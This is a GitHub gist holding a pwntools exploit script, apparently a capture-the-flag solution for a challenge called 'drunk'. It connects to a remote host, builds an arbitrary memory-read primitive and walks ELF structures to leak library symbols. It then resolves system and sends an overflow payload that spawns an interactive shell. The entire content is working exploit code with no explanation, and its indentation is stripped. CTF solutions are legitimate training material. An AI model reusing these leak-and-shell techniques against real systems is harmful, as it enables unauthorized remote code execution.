Skip to content

Instantly share code, notes, and snippets.

@kokjo
Created March 24, 2015 10:10
Show Gist options
  • Save kokjo/1415cf80edbe0eccce16 to your computer and use it in GitHub Desktop.
Save kokjo/1415cf80edbe0eccce16 to your computer and use it in GitHub Desktop.
Solution for drunk from bcft
from pwn import *
from ctypes import sizeof
ed = elf.datatypes
r = remote("146.148.79.13", 55173)
r.sendline(str(3338240).ljust(80, "\x00")+p32(0x401000))
r.recvrepeat(1)
@MemLeak
def leak(addr):
addr %= 2**32
if addr > 0x7fffffff:
addr = -(2**32 - addr)
r.sendline(str(addr).ljust(16, "A"))
data = r.recvrepeat(0.5)
# get rid of windows newline.
return data.replace("\r\n", "\n")
ptr = 0x7b800000
#find .dynamic
phdr = ptr + leak.field(ptr, ed.Elf32_Ehdr.e_phoff)
for i in range(10):
phdr += sizeof(ed.Elf32_Phdr)
typ = leak.field(phdr, ed.Elf32_Phdr.p_type)
addr = leak.field(phdr, ed.Elf32_Phdr.p_vaddr)
if(typ == 2):
break
#find .jmprel, .strtab, and .symtab
dynamic = []
while True:
typ = leak.d(addr)
val = leak.d(addr+4)
dynamic.append((typ, val))
addr += 8
if typ == 5:
strtab = val
if typ == 6:
symtab = val
if typ == 0x17:
jmprel = val
if typ == 0:
break
#leak all symbols of the wine libarry.
symbols = {}
while True:
offset = leak.d(jmprel)
info = leak.d(jmprel+4)
symidx = info >> 8
sym = symtab + symidx*sizeof(ed.Elf32_Sym)
name = leak.field(sym, ed.Elf32_Sym.st_name)
name = leak.s(strtab+name)
addr = leak.d(offset)
jmprel += 8
symbols[name] = addr
if name == "execve":
break
# have execve(a pointer to libc) want address of system
d = DynELF(leak, symbols["execve"]-175*0x1000)
system = d.lookup("system")
#verify that it begins with "push reg"
print disasm(leak.n(system, 10))
#unaligned jump to system symbol, causing it to use its 2. arg as its first.
r.sendline(str(0x401000).ljust(16)+p32(0x41424344)*8+"sh\x00\x00"+p32(system+1)+"AAAA"*500)
r.recvrepeat(0.5)
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment